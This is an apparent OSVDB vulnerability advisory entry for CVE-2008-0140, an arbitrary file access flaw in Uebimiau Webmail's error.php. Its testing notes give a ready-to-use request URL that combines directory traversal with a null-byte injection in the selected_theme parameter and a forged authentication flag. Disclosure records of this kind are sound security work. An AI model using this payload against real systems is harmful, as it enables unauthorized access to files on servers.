Uebimiau Webmail error.php selected_theme Variable Arbitrary File Access

2008-01-06T00:00:00
ID OSVDB:40201
Type osvdb
Reporter OSVDB
Modified 2008-01-06T00:00:00

Description

Manual Testing Notes

http://[target]/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00

References:

Mail List Post: http://www.attrition.org/pipermail/vim/2008-January/001867.html
Generic Exploit URL: http://www.milw0rm.com/exploits/4846
CVE-2008-0140
Bugtraq ID: 27154